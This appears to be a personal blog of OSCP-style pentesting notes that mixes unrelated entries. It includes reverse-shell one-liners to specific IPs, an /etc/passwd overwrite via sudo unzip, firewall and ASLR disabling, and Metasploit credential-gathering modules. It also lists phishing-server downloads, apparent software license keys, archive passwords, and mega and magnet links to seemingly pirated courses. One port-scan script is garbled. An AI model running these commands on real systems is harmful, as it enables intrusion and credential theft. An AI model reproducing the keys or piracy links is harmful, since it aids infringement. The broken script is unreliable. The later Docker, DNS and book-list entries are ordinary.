Wednesday, December 23, 2020

JUNK NOTE

 xterm-256color

https://drive.google.com/drive/folders/1wvvVQRapOn9860_ETKz9RQDEXh1hVUtx?usp=sharing


bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'
python -c 'import pty; pty.spawn("/bin/bash")'
tty
Ctrl + Z
echo $TERM
stty -a
stty raw -echo
fg
nc -nlvp 1234
<here You spawn the nc session again by typing by nc -lvnp 445

reset
xterm

export SHELL=bash
export TERM=xterm256-color
stty rows 37 colums 146
bash -i

export TERM=linux
-->
zip passwd.zip passwd
sudo -u root unzip -o passwd.zip -d /etc/passwd
--

openssl passwd geek

$nc 192.168.1.6 56563 


OSWE's syllabus: https://www.offensive-security.com/do... Repository of s0j0hn: https://github.com/s0j0hn/AWAE-OSWE-Prep wetw0rk: https://github.com/wetw0rk/AWAE-PREP Links: https://www.linkedin.com/in/syedumara... https://twitter.com/syed__umar https://github.com/Anon-Exploiter Site/Side project: https://umar0x01.sh https://pentestlabs.gitbook.io

 

 

###Tools### windows-privesc-check https://github.com/pentestmonkey/wind... Windows Exploit Suggester https://github.com/AonCyberLabs/Windo... MSF Exploit Suggester post/multi/recon/local_exploit_suggestor BeRoot https://github.com/AlessandroZ/BeRoot JAWS ( Just Another Windows Enum Script) https://github.com/411Hall/JAWS 

 

objdump -M intel -D start | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-7 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\\x/g' | paste -d '' -s
 

 

 

-----Disable ASLR---------
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
-----Disable stack protector-------
gcc -fno-stack-protector -z execstack



File Password: linuxia.ir
All Book Password: @Hide01


File Password For 2020 Version: hide01.ir

File Password For 2019 Version: @sanspentest

Password For Open Books In Archives: @Hide01
darkOp: dsoftw
File Password: @Hide01-@OffSecPack
All Book Password: @Hide01
------------------
Password: dl.linuxia.ir
actux
------------------------------
File Password: @sanspentest All Book Password: @Hide01
2F3R0-FHED2-M80TY-BQYGC-NPKYF YF398-0HF8P-M81RQ-2DXQE-MZUT6 ZF71R-DMX85-08DQY-8YMNC-PPHV8 ZF3R0-FHED2-M80TY-8QYGC-NPKYF YF390-0HF8P-M81RQ-2DXQE-M2UT6 ZF71R-DMX85-08DQY-8YMNC-PPHV8 AZ3E8-DCD8J-0842Z-N6NZE-XPKYF FC11K-00DE0-0800Z-04Z5E-MC8T6
 
 
#!/bin/bash
host=l0.5.5.ll
for port in {l .. 65535}; do
timeout .1 bash -c "echo >/dev/tcp/$host/$port" &&
echo "port $port is open"
done
echo "Done" 

 
 
---------------------
hascat error
sudo rm -rf ~/.hashcat/sessions/hashcat.pid
 


VBoxManage modifyvm "macos" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "macos" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "macos" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1




db_connect -y /usr/share/metasploit-framework/config/database.yml



download.phishing-server.com/dl/lucy-latest/virtualbox.zip
download.phishing-server.com/dl/lucy-latest/esxi.ova
download.phishing-server.com/dl/lucy-latest/vmware.zip
download.phishing-server.com/dl/lucy-latest/install.sh
 
macof -i wlan0 -n 15

-----Disable the firewall-----------
netsh firewall set opmode disable
-----------------------------------------------------
 
 
metasploit post exploitation phase
====================
run post/windows/gather/credentials/credntial_collector
run post/windows/gather/dumplinks
run post/windows/gather/enum_applications
run post/multi/recon/local_exploit_suggester
run /post/windows/gather/usb_history
run event_manager -i
run event_manager -c
----------------------------------------------------
win Packet Scan for Enumeratio of Access Control List
------------------------------------------------------
nmap -sW -O -PI -PT <URL or IP>
nmap -sV -Pn -T4 -vv 192.168.1.1
----------------------------------------
Super Network Tunnel
HTTPTunnel
HTTPORT
HTTHOST

Tuesday, December 22, 2020

adsadas

Perl

Simple Shells to Fully Interactive TTYs

1. Python to spawn a PTY

2. Put the shell in to background with Ctrl-Z

3. Examine the current terminal and STTY info and match it

The information needed is the TERM type (“xterm-256color”) and the size of the current TTY (“rows 37; columns 146”)

4. Set the current STTY to type raw and tell it to echo the input characters

5. Foreground the shell with fg and re-open the shell with reset

6. stty size to match our current window

7. Set PATH TERM and SHELL if missing

1
2
3
4
5
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ export TERM=xterm
$ export SHELL=bash
$ cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
$ export PS1='[\u@\h \W]\$ '
1
python -c 'import pty; pty.spawn("/bin/sh")'
 

 

shell cheetsheet

 __import__('os').system("bash -i")

 https://www.vinhnguyen.blog/2020/03/reverse-shell-cheatsheet-oscp.html

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 

Change permanent DNS in linux

sudo apt update

 sudo apt install resolvconf 

(confirm resolveconf is running)

 sudo systemctl status resolvconf.service 

(if resolveconf isn't running, enable then start it) 

sudo systemctl enable resolvconf.service

 sudo systemctl start resolvconf.service 

(check resolveconf status) 

sudo systemctl status resolvconf.service 

(edit the head file) 

sudo nano /etc/resolvconf/resolv.conf.d/head 

(enter your nameservers below the comments)

 nameserver 8.8.8.8 

nameserver 8.8.4.4 

(update resolve.conf file) 

sudo resolvconf --enable-updates

 sudo resolvconf -u 

(check if changes we successful) 

sudo nano /etc/resolv.conf 

Tuesday, December 15, 2020

Trick

change the header of PNG img

printf '\x89\x50\x4E\x47' | dd of=spoil.png bs=4 conv=notrunc

https://wadcoms.github.io/ 

Enumeration Scanning Notes

 nmap -vv -sV -sC -oN nmap.log <IP>
nmap -vv --script vuln -oN nmap-vln.log <IP>

----------------------For Spawning Shell------------------

bash -c 'bash -i >& /dev/tcp/10.9.36.195/8880 0>&1'

Sunday, July 19, 2020

Software Developer!

1. Code Complete: A Pratical Handbook of Software Construction,Second Edition
2. Design Patterns: Elements of Reusable Object-Oriented Sotware 1sr Edition
3. CLR via C#(4th Edition) (Developer Refernce)
4. Refactoring: Improving the Design of Existing code


magnet:?xt=urn:btih:f99d00d0904d3491c557d735041b2ff9484457b4&dn=%5bGigaCourse.com%5d%20Udemy%20-%20The%20Ultimate%20Guide%20to%20Game%20Development%20with%20Unity%202019&tr=http%3a%2f%2ftracker6.emce.org%3a12345%2fannounce&tr=udp%3a%2f%2fforever.publictracker.xyz%3a6969%2fannounce&tr=http%3a%2f%2fupdate.cctvqueretaro.com%3a443%2fannounce&tr=udp%3a%2f%2ftracker.cyberia.is%3a6969%2fannounce&tr=https%3a%2f%2ftracker6.lelux.fi%3a443%2fannounce&tr=http%3a%2f%2ftracker.anonwebz.xyz%3a8080%2fannounce&tr=udp%3a%2f%2fapi.bitumconference.ru%3a6969%2fannounce&tr=udp%3a%2f%2fdiscord.heihachi.pw%3a6969%2fannounce&tr=udp%3a%2f%2ffe.dealclub.de%3a6969%2fannounce&tr=udp%3a%2f%2fgra1.joshkeegan.co.uk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.vulnix.sh%3a6969%2fannounce&tr=http%3a%2f%2fbobbialbano.com%3a6969%2fannounce&tr=udp%3a%2f%2fmail.realliferpg.de%3a6969%2fannounce&tr=udp%3a%2f%2fmovies.zsw.ca%3a6969%2fannounce&tr=http%3a%2f%2fdn42.smrsh.net%3a6969%2fannounce&tr=udp%3a%2f%2fbubu.mapfactor.com%3a6969%2fannounce&tr=udp%3a%2f%2fnagios.tks.sumy.ua%3a80%2fannounce&tr=udp%3a%2f%2f6ahddutb1ucc3cp.ru%3a6969%2fannounce&tr=udp%3a%2f%2fadminion.n-blade.ru%3a6969%2fannounce&tr=udp%3a%2f%2fkawaii.social%3a6969%2fannounce&tr=udp%3a%2f%2fbenouworldtrip.fr%3a6969%2fannounce&tr=udp%3a%2f%2fbms-hosxp.com%3a6969%2fannounce&tr=udp%3a%2f%2fteamspeak.value-wolf.org%3a6969%2fannounce&tr=http%3a%2f%2f0205.uptm.ch%3a6969%2fannounce&tr=udp%3a%2f%2ft3.leech.ie%3a1337%2fannounce&tr=udp%3a%2f%2ft1.leech.ie%3a1337%2fannounce&tr=udp%3a%2f%2ffree-tracker.zooki.xyz%3a6969%2fannounce



https://kr.bt4g.org/magnet/f99d00d0904d3491c557d735041b2ff9484457b4


sinister@lamege.onmicrosoft.com

Monday, June 22, 2020

Python merg_pdf

from PyPDF2 import PdfFileMerger
import os


source_dir = os.getcwd()
merger = PdfFileMerger()


for item in os.listdir(source_dir):
    if item.endswith('pdf'):
        merger.append(item)
merger.write('SANS_760(2019).pdf')
merger.close()

Sunday, May 31, 2020

Docker Installation Guide in Linux


For the repo!!>>

sudo curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add

sudo echo 'deb https://download.docker.com/linux/debian stretch stable' > /etc/apt/sources.list.d/docker.list


In order to remove the docker image:'''
sudo apt remove docker docker-engine docker.io

To install Docker image
sudo apt-get install docker-ce


++++++++++++++++++++++++++
LCPI-1

Monday, May 4, 2020

CISSP Certification - Complete Boot Camp 2020

magnet:?xt=urn:btih:E7AA03DCDAAA6D610B1AE2E310B26BA77B47F9C9&dn=%5B+FreeCourseWeb+%5D+CISSP+Certification-+Complete+Video+Boot+Camp+2020&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969%2Fannounce;tr=udp%3A%2F%2Fexplodie.org%3A6969%2Fannounce;tr=udp%3A%2F%2Fthetracker.org%3A80%2Fannounce;tr=udp%3A%2F%2Ftracker.torrent.eu.org%3A451%2Fannounce;tr=udp%3A%2F%2Fretracker.lanta-net.ru%3A2710%2Fannounce;tr=udp%3A%2F%2Fopen.demonii.si%3A1337%2Fannounce;tr=udp%3A%2F%2Fdenis.stalker.upeer.me%3A6969%2Fannounce;tr=udp%3A%2F%2Ftracker.iamhansen.xyz%3A2000%2Fannounce;tr=udp%3A%2F%2Ftorrentclub.tech%3A6969%2Fannounce;tr=udp%3A%2F%2Ftracker.filemail.com%3A6969%2Fannounce;tr=udp%3A%2F%2Ftracker.filepit.to%3A6969%2Fannounce;tr=udp%3A%2F%2Ftracker.moeking.me%3A6969%2Fannounce;tr=udp%3A%2F%2Ftracker.nyaa.uk%3A6969%2Fannounce;tr=udp%3A%2F%2Fretracker.netbynet.ru%3A2710%2Fannounce;tr=udp%3A%2F%2Ftracker.supertracker.net%3A1337%2Fannounce


----------------------
https://www.darknet.org.uk/darknet-archives/ 

Monday, April 20, 2020

elearn

https://www.0daydown.com/04/1279743.html
https://www.downturk.net/2867173-elearnsecurity-practical-web-defense.html
Person
https://mega.nz/folder/VFEzTQhL#MbL40EgnL5rnrlFI0uOGOg
Cyber Tranning 365
https://mega.nz/folder/HGg2TCTA#CjyPNP3bktKV9w4_g2xUDg/folder/CKgShAjA
CEH  v10
https://mega.nz/folder/9QYkRCgC#qvSOMae3mHs_ykZBBbOLDg/folder/oBg3mCrC
PWN v1
https://mega.nz/folder/7qQwCIID#m2C7XUPS1URuqhgWKwrm5A
==========
https://mega.nz/folder/MUMHkQLQ#-Bfcyj8W595D4CcgLCCs4w

https://anonfile.com/Z241b3k1o6/PWK_2020_v2_7z

OSCP
https://mega.nz/folder/bApXQJpK#uGQfXbrQzh7XV8Bh5OPyog

=============
magnet:?xt=urn:btih:236D55D6F80A87728BDE8EF59B1D85C81F232BFF&dn=%5B+FreeCourseWeb+%5D+Penetration+Testing+With+Kali+Linux+PWK+2020&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969%2Fannounce;tr=udp%3A%2F%2Fexplodie.org%3A6969%2Fannounce;tr=udp%3A%2F%2Fthetracker.org%3A80%2Fannounce;tr=udp%3A%2F%2Ftracker.torrent.eu.org%3A451%2Fannounce;tr=udp%3A%2F%2Fretracker.lanta-net.ru%3A2710%2Fannounce;tr=udp%3A%2F%2Fopen.demonii.si%3A1337%2Fannounce;tr=udp%3A%2F%2Fdenis.stalker.upeer.me%3A6969%2Fannounce;tr=udp%3A%2F%2Ftracker.iamhansen.xyz%3A2000%2Fannounce;tr=udp%3A%2F%2Ftorrentclub.tech%3A6969%2Fannounce;tr=udp%3A%2F%2Ftracker.filemail.com%3A6969%2Fannounce;tr=udp%3A%2F%2Ftracker.filepit.to%3A6969%2Fannounce;tr=udp%3A%2F%2Ftracker.moeking.me%3A6969%2Fannounce;tr=udp%3A%2F%2Ftracker.nyaa.uk%3A6969%2Fannounce;tr=udp%3A%2F%2Fretracker.netbynet.ru%3A2710%2Fannounce;tr=udp%3A%2F%2Ftracker.supertracker.net%3A1337%2Fannounce  

Wednesday, April 1, 2020

Book for Hacking and Coding

- [Matt-Walker]-Certified-Ethical-Hacker-Exam-Guide
- How to Hack Like a Pornstar
- Hacker Playbook
- Hacker Playbook -2
- Hacker Playbook -3

- Metasploit – The Penetration Tester′s Guide
- Penetration Testing: A Hands-On Introduction to Hacking
- Red Team Development and Operations A Practical Guide 
- Computer Hacking Forensic Investigator (CHFI)
- Richard Blum - Professional Assembly Language (2005, Wrox)

- Reversing secrets of reverse engineering by Eldad Eilam
- The Red Team Guide by Peerlyst
- Monnappa K A - Learning Malware Analysis_ Explore the concepts, tools, and 
  techniques to analyze and investigate Windows malware-Packt Publishing (2018)
- Computer-Networking-A-Top-Down-Approach-7th-Edition

- Thomas Wilhelm - Professional Penetration Testing_ Creating and Operating a
   Formal Hacking Lab (2009)
64-ia-32-architectures-software-developer-vol-1-manual
- Unleashing the Ideavirus by Seth Godin, Malcolm Gladwell
- Michal Jaworski, Tarek Ziade - Expert Python Programming (2019, Packt 
  Publishing)
-ubuntu and Centos linux server administration by MD. Tanvir Rahman

- Extreme C Taking you to the limit in Concurrency, OOP, and the most advanced 
  capabilities of C by Kamran Amini
 - First Course in Algorithms Through Puzzles by Ryuhei Uehara
- Introduction to algorithms by Thomas H. Cormen, Charles E. Leiserson, Ronald
  L. Rivest, Clifford Stein
- C++ A Beginners Guide, Second Edition by Herbert Schildt
- Foundations of Game Engine Development, Volume 1 Mathematics by Eric
  Lengyel

- Unity 2D Game Development by Dave Calabrese
- Sets, logic and maths for computing by David Makinson (auth.)
- Mathematics for Game Developers
- Computer-Science-Distilled
- Data Structures and Algorithms - Narasimha Karumanchi

- Practical Malware Analysis
- Hacking the art of exploitation
- The C Programming Language by Brian W. Kernighan, Dennis M. Ritchie
- The Shellcoder's Handbook Discovering and Exploiting Security Holes
- Penetration Testing Shellcode. Detect, exploit, and secure network-level and operating system vulnerabilities by Hamza Megahed

- Python for Offensive PenTest by Hussam Khrais
- How to Hack Computers how to hack computers, hacking for beginners, penetration testing, hacking for dummies, computer security, computer hacking, hacking techniques, network scanning by Tope, Joel (z-lib.org)
- lpic1
- Mastering Reverse Engineering 1st Edition
- Cyber Operations Building, Defending, and Attacking 2nd Edition

- UNIX and Linux System Administration Handbook
- CPENT - Certified Penetration Testing Professional
- Mastering Linux Administration A comprehensive guide to installing
- Attacking Network Protocols_ A Hacker’s Guide to Capture, Analysis, and Exploitation
- The Pentester BluePrint Starting a Career as an Ethical_Hacker

- Linux System Programming Techniques - Become a proficient Linux system programmer using expert recipes and techniques by Jack-Benny Persson
- Learn C the Hard Way Practical Exercises on the Computational Subjects You Keep Avoiding (Till lesson 30)
- CEH v11[2020]
- SEC 552 (Bug Bounties and responsible disclosure)[2021]
- Learn Python 3 the Hard Way A Very Simple Introduction to the Terrifyingly Beautiful World of Computers and Code by Zed A. Shaw

- The Official Radare 2 Book
- Notsosecure - Advanced Web Hacking
- Python Tricks A Buffet of Awesome Python Features
-
-

-
-
-
-
-

-
-
-
-
-
-
-
-
-
-

-
-
-
-
-

-
-
-
-
-

-
-
-
-
-

-
-
-
-
-

-
-
-
-
-
-
-
-
-
-

-
-
-
-
-

-
-
-
-
-



 








Monday, March 16, 2020

OSCP----GUIDEEE

1. https://medium.com/bugbountywriteup/5-tips-for-oscp-prep-76001cdf4f4f
2. https://github.com/sshuttle/sshuttle
3. https://github.com/codingo/Reconnoitre
4. https://github.com/justinsteven/dostackbufferoverflowgood
5. http://kevsec.fr/resources
6. https://h4cklife.org/beefhook/
7. https://kevsec.fr/journey-to-oscp-2019-write-up
8. https://medium.com/@east4era/my-oscp-journey-50ebb1d001ad
9. https://coffeejunkie.me/OSCP-Exam-Overview/
10. https://www.vulnhub.com/author/creosote,584/
11. https://slayerlabs.com
12. https://adsecurity.org/?page_id=4031
13. https://guide.offsecnewbie.com/
14. https://tryhackme.com
15. https://ippsec.rocks/#   ----Very helpful for ippsec video
16. https://medium.com/@falconspy/oscp-approved-tools-b2b4e889e707 ---- For tools we can use!
17. https://www.pentesteracademy.com/course?id=13
18. https://arvandy.com/oscp-preparation/ ---Relvant...
19. https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview#
20. https://zero-day.io/buffer-overflow-introduction/?utm_source=share&utm_medium=ios_app&utm_name=iossmf
21. https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
===githut
https://github.com/peanuthacker92/oscp_checklist
=====================
https://teckk2.github.io/oscp%20guide/2018/05/14/OSCP-Basic.html

war games
1. https://www.underthewire.tech/wargames.htm
2. https://morph3sec.com/Cheat-Sheets/Windows-Red-Team-Cheat-Sheet/

Saturday, March 7, 2020

Networking pdf only

Please don't tell Secret Password Anyone
Please don't throw Sausage Pizza Away
TCP/IP comes in A TIN
1. https://www.getsfreebook.com/gets/ccna-200-301-official-cert-guide



2. https://sanet.ws




OSCP

___________________________________________________________________
No |  Machine Name                                          |Finish
-----+-------------------------------------------------------------------+------------------------------
1    | Kioptrix Level 1                                          | Done
2    | Kioptrix Level 1.1                                       | Done
3    | Kioptrix Level 1.2                                       | Done
4    | Kioptrix Level 1.3                                       | Done
5    | Kioptrix 5                                                    | ...
6    | pWnOS v2.0                                                | ....
7    | SickOs 1                                                      |
8    | SickOS 1.2                                                  |
9    | Stapler                                                        |
10  | Tr0ll                                                            |
11  | Tr0ll2                                                          |
12  | Vulnix                                                          |
13  | VulnOSv2                                                    |
14  | FristiLeaks 1.3                                            |
15  | LordOfTheRoot 1.0.1                                  |
16  | mrRobot                                                      |
17  | pwnlab_init                                                  |
-----+-------------------------------------------------------------------+--------------------------------
+-_-+ https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms +-_-+